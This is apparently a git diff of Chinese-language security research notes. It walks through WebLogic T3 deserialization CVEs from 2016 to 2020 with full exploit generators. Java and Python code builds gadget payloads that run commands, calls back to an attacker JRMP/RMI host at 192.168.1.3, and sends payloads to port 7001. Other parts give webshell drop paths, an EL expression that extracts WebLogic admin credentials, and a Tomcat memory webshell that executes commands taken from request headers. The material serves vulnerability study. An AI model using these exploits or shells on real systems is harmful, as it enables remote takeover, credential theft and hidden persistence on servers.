weblogic.jms.common.StreamMessageImpl; - -import java.io.*; - -public class CVE_2016_0638 { - - public static void main(String[] args) throws IOException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_0638"); - StreamMessageImpl streamMessage = new StreamMessageImpl(payload); - ser(streamMessage, "CVE_2016_0638.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年4月p22505423_1036_Generic -把原生的ois换成了FilteringObjectInputStream - -## CVE-2016-3510 - -weblogic.corba.utils.MarshalledObject不在黑名单中,并且在readResolve的时候会读取objBytes的值赋给新new的ois。那么我们在objBytes中放入rce payload即可。 - -![image-20210815103750342](img/image-20210815103750342.png) - -```java -import weblogic.corba.utils.MarshalledObject; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2016_3510 { - public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchFieldException, IllegalAccessException { - byte[] payload = exec("CommonsCollections1", "touch /tmp/CVE_2016_3510"); - MarshalledObject marshalledObject = new MarshalledObject("foo"); - Class cls = marshalledObject.getClass(); - Field field = cls.getDeclaredField("objBytes"); - field.setAccessible(true); - field.set(marshalledObject, payload); - ser(marshalledObject,"./CVE_2016_3510.ser"); - } - - public static byte[] exec(String gadget, String command) throws IOException { - String[] cmd = {"java", "-jar", "/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar", gadget, command}; - InputStream in = Runtime.getRuntime().exec(cmd).getInputStream(); - - ByteArrayOutputStream baos = new ByteArrayOutputStream(); - byte[] b = new byte[4096]; - int a = -1; - - while ((a = in.read(b)) != -1) { - baos.write(b, 0, a); - } - - return baos.toByteArray(); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2016年10月 p23743997_1036_Generic -重写了resolveClass方法,加了过滤。 - -## CVE-2017-3248 - -![image-20210815110026954](img/image-20210815110029190.png) - -通过jrmpclient去触发反序列化,然后在去连接我们的jrmplistener在触发反序列化漏洞。 - -```python -import socket -import sys -import struct -import re -import subprocess -import binascii - -def get_payload1(gadget, command): - JAR_FILE = '/Users/cengsiqi/Desktop/javasectools/ysoserial/target/ysoserial-0.0.6-SNAPSHOT-all.jar' - popen = subprocess.Popen(['java', '-jar', JAR_FILE, gadget, command], stdout=subprocess.PIPE) - return popen.stdout.read() - -def get_payload2(path): - with open(path, "rb") as f: - return f.read() - -def exp(host, port, payload): - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.connect((host, port)) - - handshake = "t3 12.2.3\nAS:255\nHL:19\nMS:10000000\n\n".encode() - sock.sendall(handshake) - data = sock.recv(1024) - pattern = re.compile(r"HELO:(.*).false") - version = re.findall(pattern, data.decode()) - if len(version) == 0: - print("Not Weblogic") - return - - print("Weblogic {}".format(version[0])) - data_len = binascii.a2b_hex(b"00000000") #数据包长度,先占位,后面会根据实际情况重新 - t3header = binascii.a2b_hex(b"016501ffffffffffffffff000000690000ea60000000184e1cac5d00dbae7b5fb5f04d7a1678d3b7d14d11bf136d67027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006") #t3协议头 - flag = binascii.a2b_hex(b"fe010000") #反序列化数据标志 - payload = data_len + t3header + flag + payload - payload = struct.pack('>I', len(payload)) + payload[4:] #重新计算数据包长度 - sock.send(payload) - -if __name__ == "__main__": - host = "127.0.0.1" - port = 7001 - gadget = "JRMPClient" #CommonsCollections1 Jdk7u21 JRMPClient - command = "192.168.1.3:8080" # - - payload = get_payload1(gadget, command) - exp(host, port, payload) -``` - -### 修复 - -补丁:p24667634_1036_Generic -官方的修复是新加resolveProxyClass,过滤java.rmi.registry.Registry - -## CVE-2018-2628 - -上面提到过滤了Registry,这样ysoserial中原生JRMPClient就打不了,但是仍然有多种办法bypass。 - ->这个CVE廖也提交了绕过,他的绕过是用java.rmi.activation.Activator替换java.rmi.registry.Registry,从而绕过resolveProxyClass的判断。其实这里对接口没有要求,不一定是rmi接口,随便找一个接口都行,比如java.util.Map - -直接用UnicastRef。CVE-2017-3248的构造中把UnicastRef放入了Registry,其实用UnicastRef也能在反序列化的时候发起jrmp请求。这种方法要比替换接口的干脆很多。在ysoserial中加一个JRMPClient2 - -```java -package ysoserial.payloads; - -import java.rmi.server.ObjID; -import java.util.Random; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import ysoserial.payloads.annotation.Authors; -import ysoserial.payloads.annotation.PayloadTest; -import ysoserial.payloads.util.PayloadRunner; - - -@SuppressWarnings ( { - "restriction" -} ) -@PayloadTest( harness="ysoserial.test.payloads.JRMPReverseConnectSMTest") -@Authors({ Authors.MBECHLER }) -public class JRMPClient2 extends PayloadRunner implements ObjectPayload { - - public UnicastRef getObject ( final String command ) throws Exception { - - String host; - int port; - int sep = command.indexOf(':'); - if ( sep < 0 ) { - port = new Random().nextInt(65535); - host = command; - } - else { - host = command.substring(0, sep); - port = Integer.valueOf(command.substring(sep + 1)); - } - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint(host, port); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - return ref; - } - - - public static void main ( final String[] args ) throws Exception { - Thread.currentThread().setContextClassLoader(JRMPClient.class.getClassLoader()); - PayloadRunner.run(JRMPClient.class, args); - } -} -``` - -### 修复 - -补丁:2018年四月发布的p27395085_1036_Generic -UnicastRef在weblogic.utils.io.oif.WebLogicFilterConfig中加进了黑名单。 - -## CVE-2018-2893 - -streamMessageImpl + jrmp代理类绕过。先来看payload - -```java -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import weblogic.jms.common.StreamMessageImpl; - -import java.io.*; -import java.lang.reflect.Proxy; -import java.rmi.registry.Registry; -import java.rmi.server.ObjID; -import java.rmi.server.RemoteObjectInvocationHandler; -import java.util.Random; - -public class CVE_2018_2893 { - public static void main(String[] args) throws IOException { - ObjID objID = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint tcpEndpoint = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef unicastRef = new UnicastRef(new LiveRef(objID, tcpEndpoint, false)); - RemoteObjectInvocationHandler remoteObjectInvocationHandler = new RemoteObjectInvocationHandler(unicastRef);//通过代理 - Object object = Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), new Class[] { Registry.class }, remoteObjectInvocationHandler); - StreamMessageImpl streamMessage = new StreamMessageImpl(serialize(object)); - ser(streamMessage, "CVE_2018_2893.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - - public static byte[] serialize(final Object obj) throws IOException { - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - serialize(obj, out); - return out.toByteArray(); - } - - public static void serialize(final Object obj, final OutputStream out) throws IOException { - final ObjectOutputStream objOut = new ObjectOutputStream(out); - objOut.writeObject(obj); - } -} -``` - -### 修复 - -补丁:18年7月 p27919965_1036_Generic -这次修复把经过resolveClass的java.rmi.server.RemoteObjectInvocationHandler给过滤了。 - -## CVE-2018-3245 - ->根据前面的分析可知,我们只需要找一个类似java.rmi.server.RemoteObjectInvocationHandler的类进行替换,就能继续绕过了。 ->那么这个类应该满足以下条件: ->继承远程类:java.rmi.server.RemoteObject ->不在黑名单里边(java.rmi.activation. 、sun.rmi.server.) ->随便找了一下,符合条件的挺多的: ->javax.management.remote.rmi.RMIConnectionImpl_Stub ->com.sun.jndi.rmi.registry.ReferenceWrapper_Stub ->javax.management.remote.rmi.RMIServerImpl_Stub ->sun.rmi.registry.RegistryImpl_Stub ->sun.rmi.transport.DGCImpl_Stub - -```java -import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub; -import sun.rmi.server.UnicastRef; -import sun.rmi.transport.LiveRef; -import sun.rmi.transport.tcp.TCPEndpoint; -import java.io.*; -import java.rmi.server.ObjID; -import java.util.Random; - -public class CVE_2018_3245 { - public static void main(String[] args) throws IOException { - ObjID id = new ObjID(new Random().nextInt()); // RMI registry - TCPEndpoint te = new TCPEndpoint("192.168.1.3", 8080); - UnicastRef ref = new UnicastRef(new LiveRef(id, te, false)); - ReferenceWrapper_Stub wrapperStub = new ReferenceWrapper_Stub(ref); - ser(wrapperStub, "CVE_2018_3245.ser"); - - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_201808Generic -修复方法是添加更底层的java.rmi.server.RemoteObject。 - -## CVE-2018-3191 - -这个洞是jndi注入。触发点在JtaTransactionManager。 - -```java -import com.bea.core.repackaged.springframework.transaction.jta.JtaTransactionManager; - -import java.io.File; -import java.io.FileOutputStream; -import java.io.IOException; -import java.io.ObjectOutputStream; - -public class CVE_2018_3191 { - public static void main(String[] args) throws IOException { - String jndiAddress = "rmi://192.168.1.3:1099/Exploit"; - JtaTransactionManager jtaTransactionManager = new JtaTransactionManager(); - jtaTransactionManager.setUserTransactionName(jndiAddress); - ser(jtaTransactionManager, "CVE_2018_3191.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } -} -``` - -### 修复 - -补丁:2018年8月 p28343311_1036_Generic - - - - - -## CVE-2020-2555 - -Oracle Coherence组件存在漏洞,该组件默认集成在Weblogic12c及以上版本中(网上资料这么说的:web10.3.6也有只是默认没有启用,未验证)。 -这个漏洞和cc5的构造有异曲同工之妙,触发点在BadAttributeValueExpException#readObject 中调用toString方法。 - -**Coherence组件** - -```java -import com.tangosol.util.ValueExtractor; -import com.tangosol.util.extractor.ChainedExtractor; -import com.tangosol.util.extractor.ReflectionExtractor; -import com.tangosol.util.filter.LimitFilter; - -import javax.management.BadAttributeValueExpException; -import java.io.*; -import java.lang.reflect.Field; - -public class CVE_2020_2555 { - public static void main(String[] args) throws NoSuchFieldException, IllegalAccessException, IOException, ClassNotFoundException { - //String cmd = "touch /tmp/CVE_2020_2555_12013"; - String cmd ="calc.exe"; - ValueExtractor[] valueExtractors = new ValueExtractor[]{ - new ReflectionExtractor("getMethod", new Object[]{"getRuntime", new Class[0]}), - new ReflectionExtractor("invoke", new Object[]{null, new Object[0]}), - //new ReflectionExtractor("exec", new Object[]{new String[]{"/bin/bash", "-c", cmd}}) - new ReflectionExtractor("exec", new Object[]{new String[]{"cmd.exe", "/c", cmd}}) - }; - // chain - LimitFilter limitFilter = new LimitFilter(); - limitFilter.setTopAnchor(Runtime.class); - BadAttributeValueExpException expException = new BadAttributeValueExpException(null); - Field m_comparator = limitFilter.getClass().getDeclaredField("m_comparator"); - m_comparator.setAccessible(true); - m_comparator.set(limitFilter, new ChainedExtractor(valueExtractors)); - Field m_oAnchorTop = limitFilter.getClass().getDeclaredField("m_oAnchorTop"); - m_oAnchorTop.setAccessible(true); - m_oAnchorTop.set(limitFilter, Runtime.class); - Field val = expException.getClass().getDeclaredField("val"); - val.setAccessible(true); - val.set(expException, limitFilter); - ser(expException, "./CVE_2020_2555_12013.ser"); - } - - public static void ser(Object obj, String serName) throws IOException { - File file = new File(serName); - ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(file)); - oos.writeObject(obj); - System.out.println("-------序列化成功" + serName); - } - -} -``` - -### 修复 - -删了extractor.extract - -## 总结 - -参考大师傅文章梳理完一遍之后,我们得以看到整个绕过思路的全貌。笔者主观分为三个阶段。 - -- 第一阶段,CVE-2016-0638和CVE-2016-3510。利用反序列化流程中新new的原生ois绕过,只要找到了read*系列的点可以比较容易的看出来。 -- 第二阶段,cve-2017-3248到cve-2018-3191。利用jrmp、jndi带外rce,漏洞点没有在read*的代码上下文中需要多跟几步有点“pop”的感觉了。 -- 第三阶段,cve-2020-2555,需要对java的反序列化出现过知识点很熟悉(java原生类的触发点+weblogic组件中类似cc的套路),据说这个漏洞的作者也挖了很久。 - - - - - - - - - - - ->参考: -> ->https://www.yuque.com/tianxiadamutou/zcfd4v/aevpg0 -> ->http://redteam.today/2020/03/25/weblogic%E5%8E%86%E5%8F%B2T3%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%8F%8A%E8%A1%A5%E4%B8%81%E6%A2%B3%E7%90%86/ -> ->https://y4er.com/post/weblogic-jrmp/ -> ->http://drops.xmd5.com/static/drops/web-13470.html -> ->https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247485058&idx=1&sn=d22b310acf703a32d938a7087c8e8704 -> ->http://blog.orange.tw/2018/03/pwn-ctf-platform-with-java-jrmp-gadget.html diff --git a/Weblogic/Weblogic trick.md b/Weblogic/Weblogic trick.md new file mode 100644 index 0000000..6153bc9 --- /dev/null +++ b/Weblogic/Weblogic trick.md @@ -0,0 +1,29 @@ +## Weblogic trick + +## 写文件rce + +``` +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\shell.jsp +访问:\bea_wls_internal\shell.jsp + + +\server\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp +访问:\console\framework\skins\wlsconsole\images\shell.jsp + +\server\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\随机字符\war\shell.jsp +访问:\uddiexplorer\shell.jsp + +\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\项目名\随机字符\war\shell.jsp + +访问:\项目名\shell.jsp +``` + +### 获得用户密码 + +https://github.com/TideSec/Decrypt_Weblogic_Password + +el表达式 + +```java +${pageContext.setAttribute("classLoader",Thread.currentThread().getContextClassLoader());pageContext.setAttribute("httpDataTransferHandler",pageContext.getAttribute("classLoader").loadClass("weblogic.deploy.service.datatransferhandlers.HttpDataTransferHandler"));pageContext.setAttribute("managementService", pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.ManagementService"));pageContext.setAttribute("authenticatedSubject",pageContext.getAttribute("classLoader").loadClass("weblogic.security.acl.internal.AuthenticatedSubject"));pageContext.setAttribute("propertyService",pageContext.getAttribute("classLoader").loadClass("weblogic.management.provider.PropertyService"));pageContext.setAttribute("KERNE_ID",pageContext.getAttribute("httpDataTransferHandler").getDeclaredField("KERNE_ID"));pageContext.getAttribute("KERNE_ID").setAccessible(true);pageContext.setAttribute("getPropertyService",managementService.getMethod("getPropertyService",pageContext.getAttribute("authenticatedSubject")));pageContext.getAttribute("getPropertyService").setAccessible(true);pageContext.setAttribute("prop",pageContext.getAttribute("getPropertyService").invoke(null,pageContext.getAttribute("KERNE_ID").get((null))));pageContext.setAttribute("getTimestamp1",propertyService.getMethod("getTimestamp1"));pageContext.getAttribute("getTimestamp1").setAccessible(true);pageContext.setAttribute("getTimestamp2",propertyService.getMethod("getTimestamp2"));pageContext.getAttribute("getTimestamp2").setAccessible(true);pageContext.setAttribute("username", pageContext.getAttribute("getTimestamp1").invoke(pageContext.getAttribute("prop")));pageContext.setAttribute("password",pageContext.getAttribute("getTimestamp2").invoke(pageContext.getAttribute("prop")));pageContext.getAttribute("username").concat("/").concat(pageContext.getAttribute("password"))} +``` diff --git a/apache storm/Readme.md b/apache storm/Readme.md new file mode 100644 index 0000000..c269064 --- /dev/null +++ b/apache storm/Readme.md @@ -0,0 +1,21 @@ +# apache storm + +## 环境搭建 + +https://blog.51cto.com/u_13870740/3445168 + +https://github.com/heibaiying/BigData-Notes/blob/master/notes/installation/Storm%E5%8D%95%E6%9C%BA%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA.md + +``` +nohup bash storm dev-zookeeper & bash storm nimbus & bash storm supervisor &bash storm ui & bash storm logviewer & +``` + +## 漏洞分析 + +https://paper.seebug.org/1780/#0x03 + +https://blog.noah.360.net/apache-storm-vulnerability-analysis/ + +https://y4er.com/posts/apache-storm-two-cve/ + +**自己尝试反序列化并没有成功cb,环境是2.1.0** diff --git a/hadoop/Readme.md b/hadoop/Readme.md new file mode 100644 index 0000000..7e168b6 --- /dev/null +++ b/hadoop/Readme.md @@ -0,0 +1,21 @@ +# Hadoop + +[【安全风险通告】Apache Hadoop Yarn RPC未授权访问漏洞安全风险通告](https://mp.weixin.qq.com/s?__biz=MzU5NDgxODU1MQ==&mid=2247495027&idx=1&sn=5758a6717309a55e09f184e5bae82c75&chksm=fe79c9ebc90e40fd6d0c3f0bd21ce92f53b4f58aa0ee07d0c005ca85a28d2cfd70f61c40fae7&mpshare=1&scene=23&srcid=1123jW67UF5RY5e5aOeDZ5ha&sharer_sharetime=1637638003307&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) + +[Hadoop Yarn RPC RCE 复现](https://mp.weixin.qq.com/s/lVl5HnVuZyLTIeSrbw1cuA) + +[Hadoop Yarn RPC未授权RCE(含一键利用工具)](https://mp.weixin.qq.com/s?__biz=MzkwNDI1NDUwMQ==&mid=2247485150&idx=1&sn=c31937fdb3e92ae3951a98b7967032b2&chksm=c0888394f7ff0a8224a8984f2cb4935f9aa1e7d243c4b512c488600d8fef0b6ec16a2b345865&token=616099468&lang=zh_CN#rd) + +[Hadoop Yarn RPC未授权访问漏洞复现](https://zgao.top/hadoop-yarn-rpc%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/) + +[GHSL-2022-012: Arbitrary file write during TAR extraction in Apache Hadoop - CVE-2022-26612](https://securitylab.github.com/advisories/GHSL-2022-012_Apache_Hadoop/) + +## 环境搭建 + +org.apache.hadoop.yarn.util.resource.ResourceUtils + +``` +docker pull kpli0rn/hadoop-rpc-vuln:3.3.0 +docker run -d --name yarn -p 8042:8042 -p 8032:8032 kpli0rn/hadoop-rpc-vuln:3.3.0 +``` + diff --git a/image.png b/image.png new file mode 100644 index 0000000..2fb9c15 Binary files /dev/null and b/image.png differ diff --git "a/java\345\206\205\345\255\230\351\251\254/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Readme.md" index bf4e168..4859d8a 100644 --- "a/java\345\206\205\345\255\230\351\251\254/Readme.md" +++ "b/java\345\206\205\345\255\230\351\251\254/Readme.md" @@ -7,8 +7,19 @@ + [JavaWeb 内存马二周目通关攻略](https://su18.org/post/memory-shell-2/) + [【原创】利用“进程注入”实现无文件不死webshell](https://www.cnblogs.com/rebeyond/p/9686213.html) +## springboot ++ [利用 intercetor 注入 spring 内存 webshell](https://landgrey.me/blog/19/) + +## spring ++ [基于内存 Webshell 的无文件攻击技术研究](https://landgrey.me/blog/12/) ++ [前尘——内存中无处可寻的木马](https://www.anquanke.com/post/id/253475) + ## 后门 + [一种tomcat中间件留持久化后门的思路](https://gv7.me/articles/2021/an-idea-of-keeping-persistent-backdoor-in-tomcat-middleware/) ++ [JavaWeb 内存马二周目通关攻略](https://tttang.com/archive/1313) + +## jsp ++ [](https://xz.aliyun.com/t/10372) ## 查杀 + [查杀Java web filter型内存马](https://gv7.me/articles/2020/kill-java-web-filter-memshell/) diff --git "a/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" new file mode 100644 index 0000000..596af80 --- /dev/null +++ "b/java\345\206\205\345\255\230\351\251\254/Upgrade/Readme.md" @@ -0,0 +1,99 @@ +# Upgrade + +参考:https://tttang.com/archive/1709 + +```java +package com.example.demo; + + +import org.apache.catalina.connector.Connector; +import org.apache.catalina.connector.Request; +import org.apache.catalina.connector.RequestFacade; +import org.apache.coyote.Adapter; +import org.apache.coyote.Processor; +import org.apache.coyote.Response; +import org.apache.coyote.UpgradeProtocol; +import org.apache.coyote.http11.AbstractHttp11Protocol; +import org.apache.coyote.http11.upgrade.InternalHttpUpgradeHandler; +import org.apache.tomcat.util.net.SocketWrapperBase; +import org.springframework.web.context.request.RequestContextHolder; +import org.springframework.web.context.request.ServletRequestAttributes; + +import javax.servlet.http.HttpServletRequest; +import java.lang.reflect.Field; +import java.nio.ByteBuffer; +import java.util.HashMap; + +public class UpgradeMemShell implements UpgradeProtocol { + + public UpgradeMemShell() throws Exception{ + HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest(); + RequestFacade rf = (RequestFacade) request; + Field requestField = RequestFacade.class.getDeclaredField("request"); + requestField.setAccessible(true); + Request request1 = (Request) requestField.get(rf); + + Field connector = Request.class.getDeclaredField("connector"); + connector.setAccessible(true); + Connector realConnector = (Connector) connector.get(request1); + + Field protocolHandlerField = Connector.class.getDeclaredField("protocolHandler"); + protocolHandlerField.setAccessible(true); + AbstractHttp11Protocol handler = (AbstractHttp11Protocol) protocolHandlerField.get(realConnector); + + HashMap upgradeProtocols = null; + Field upgradeProtocolsField = AbstractHttp11Protocol.class.getDeclaredField("httpUpgradeProtocols"); + upgradeProtocolsField.setAccessible(true); + upgradeProtocols = (HashMap) upgradeProtocolsField.get(handler); + upgradeProtocols.put("http2.0", this); + upgradeProtocolsField.set(handler, upgradeProtocols); + System.out.println("success"); + } + + @Override + public String getHttpUpgradeName(boolean b) { + return null; + } + + @Override + public byte[] getAlpnIdentifier() { + return new byte[0]; + } + + @Override + public String getAlpnName() { + return null; + } + + @Override + public Processor getProcessor(SocketWrapperBase socketWrapperBase, Adapter adapter) { + return null; + } + + @Override + public InternalHttpUpgradeHandler getInternalUpgradeHandler(Adapter adapter, org.apache.coyote.Request request) { + return null; + } + + public boolean accept(org.apache.coyote.Request request) { + System.out.println("MyUpgrade.accept"); + String p = request.getHeader("cmd"); + try { + String[] cmd = System.getProperty("os.name").toLowerCase().contains("windows") ? new String[]{"cmd.exe", "/c", p} : new String[]{"/bin/sh", "-c", p}; + Field response = org.apache.coyote.Request.class.getDeclaredField("response"); + response.setAccessible(true); + Response resp = (Response) response.get(request); + byte[] result = new java.util.Scanner(new ProcessBuilder(cmd).start().getInputStream()).useDelimiter("\\A").next().getBytes(); + resp.doWrite(ByteBuffer.wrap(result)); + } catch (Exception e){} + return false; + } +} +``` + +使用 +```txt +Upgrade: http2.o +cmd: calc +Connection: Upgrade +``` diff --git "a/java\345\233\236\346\230\276/Readme.md" "b/java\345\233\236\346\230\276/Readme.md" index b2202a8..6b74f01 100644 --- "a/java\345\233\236\346\230\276/Readme.md" +++ "b/java\345\233\236\346\230\276/Readme.md" @@ -1,9 +1,40 @@ # java回显 +**2022/5/2更新,发现fnmsd师傅弄跟dsf的回显感觉很np** +``` +https://blog.csdn.net/fnmsd/article/details/106709736 +https://blog.csdn.net/fnmsd/article/details/106890242 +``` + 发现个好项目 https://github.com/feihong-cs/Java-Rce-Echo >一般web服务是想办法获得response对象,可以参考[2021RCTF ezshell](https://github.com/Firebasky/ctf-Challenge/tree/main/RCTF-2021-EZshell) +### 异常回显 + +我们将命令执行的结果给Exception(result),因为Exception可以传递string,在抛出异常throw e;之后在命令执行的过程中如果目标的代码逻辑存在过程中错误抛出异常就可以看到回显内容 + +```java +import java.io.BufferedReader; +import java.io.InputStreamReader; +public class RunCheckConfig { +public RunCheckConfig(String args) throws Exception +{ +Process proc = Runtime.getRuntime().exec(args); +BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream())); +StringBuffer sb = new StringBuffer(); +String line; +while ((line = br.readLine()) != null) +{ +sb.append(line).append("\n"); +} +String result = sb.toString(); +Exception e=new Exception(result); +throw e; +} +} +``` +**目前暂时没有找到真实的demo.....** ### URLClassLoader抛出异常 @@ -318,3 +349,4 @@ org.springframework.webflow.context.ExternalContextHolder.getExternalContext() >[前尘——返回执行结果的回显链](https://www.anquanke.com/post/id/253661) > >[Weblogic使用ClassLoader和RMI来回显命令执行结果](https://xz.aliyun.com/t/7228) +>[JAVA反序列化回显学习](https://cangqingzhe.github.io/2020/12/17/JAVA%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E5%9B%9E%E6%98%BE%E5%AD%A6%E4%B9%A0/) diff --git "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" index 9a445e4..34fce36 100644 --- "a/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" +++ "b/java\345\260\217\345\236\213\346\241\206\346\236\266/Readme.md" @@ -24,3 +24,8 @@ https://www.sec-in.com/author/8 这个师傅太猛了 + 2021/12/21 [绕过后缀安全检查进行文件上传](https://sec-in.com/article/647) **解决了条件竞争不知道文件名的问题,通过异常报错让程序停止向下执行绕过。(在multipart做文章)** + 2021/12/21 [绕过后缀安全检查进行文件上传-2](https://www.sec-in.com/article/1328) **只能说非常np了,servlet单例,属性在调用时会被共享,存在线程安全问题。扩展一下java中volatile有可能存在线程安全问题[参考](https://github.com/Firebasky/Java/blob/main/java%E6%97%A5%E5%B8%B8/Thinking_in_java%E9%AB%98%E7%BA%A7%E4%B9%8Bvolatile.md)** 看看能不能搭建一个环境复现一下。。。。 + 2022/01/31 [验证是否存在写文件漏洞小技巧](https://mp.weixin.qq.com/s?__biz=MzkyMDIxMjE5MA==&mid=2247483994&idx=1&sn=2d29f31afa27a3709b5dc9e46532230a&chksm=c19705ebf6e08cfdd6dc59937beee4a77110b3cac9958335a6cfdbd020d00f2f24a7033063f2&mpshare=1&scene=23&srcid=0131EzMk9fpayyNZeXFR8nhb&sharer_sharetime=1643561054742&sharer_shareid=33a823b10ae99f33a60db621d83241cb#rd) ++ 2022/02/26 [记一次曲折的weblogic上传webshell](https://chaserw.github.io/2021/11/05/%E8%AE%B0%E4%B8%80%E6%AC%A1%E6%9B%B2%E6%8A%98%E7%9A%84weblogic%E4%B8%8A%E4%BC%A0webshell/) ++ 2022/10/08 [实战 | 一次成功的子域名劫持](https://mp.weixin.qq.com/s/xA6OVbeQrCgeYBWMtkvWVA) **学习** ++ 2022/10/22 [上传包可“绕过”Java过滤器的检查?](https://gv7.me/articles/2019/why-can-multipart-post-bypass-java-filter/) **遇到了post请求有waf可以试一试文件上传的方法传递参数** ++ 2022/10/22 [burpsuite保存现有数据包记录&导入之前的抓包记录](https://blog.csdn.net/Fly_hps/article/details/88854111) [148处XSS你如何提交给开发修复?](https://gv7.me/articles/2017/how-do-to-submit-148-xss-vulnerabilities/) **bp的保存数据** ++ 2022/11/06 [【干货分享】五分钟教你挖掘小程序漏洞](https://mp.weixin.qq.com/s/95YiN8XJLGPUS5ykBUsmAg【干货分享】五分钟教你挖掘小程序漏洞) **小程序挖掘** diff --git "a/java\346\227\245\345\270\270/Readme.md" "b/java\346\227\245\345\270\270/Readme.md" index e8e39cd..a8914bd 100644 --- "a/java\346\227\245\345\270\270/Readme.md" +++ "b/java\346\227\245\345\270\270/Readme.md" @@ -47,7 +47,7 @@ + 2021/10/26 [Hessian 原理分析](https://www.cnblogs.com/shangxiaofei/p/4222170.html) 大概就是以二进制数组传输的rpc,存在反序列化问题。 + 2021/10/26 [XXL-JOB Hessian2反序列化漏洞](https://www.mi1k7ea.com/2021/04/22/XXL-JOB-Hessian2%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E/) + 2021/10/30 [Mojarra JSF ViewState 反序列化漏洞](https://blog.csdn.net/xuandao_ahfengren/article/details/113135364) -+ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** ++ 2021/11/02 [关于Java 中 XXE 的利用限制探究](https://www.freebuf.com/articles/web/284225.html) **使用http外带数据不能有换行,使用ftp可以解决,但是ftp在java 8u131修复了这个漏洞 CVE-2017-3533** [代码修复](https://github.com/openjdk/jdk8u-dev/commit/644ddd7722bea502f029378c22d51b6eb66f8c25) + 2021/11/02 [Adobe ColdFusion 反序列化漏洞(CVE-2017-3066)](https://github.com/vulhub/vulhub/blob/master/coldfusion/CVE-2017-3066/README.zh-cn.md) 暴露接口反序列化。。。 + 2021/11/03 [浅谈Liferay Portal JSON Web Service未授权反序列化远程代码执行漏洞](https://xz.aliyun.com/t/7485) + 2021/11/03 [H2 Database Console 未授权访问](https://github.com/vulhub/vulhub/blob/master/h2database/h2-console-unacc/README.zh-cn.md) @@ -103,3 +103,221 @@ + 2022/02/10 [OpenRASP 两次绕过](https://mp.weixin.qq.com/s/hkL8VPHnTgFsOCCrNlRpzQ) **1.修改特征值 2.在静态代码里面开启新线程调用恶意方法** + 2022/02/21 **java 中存在编译时执行函数(注解的方式执行)** + 2022/02/23 [原创 | 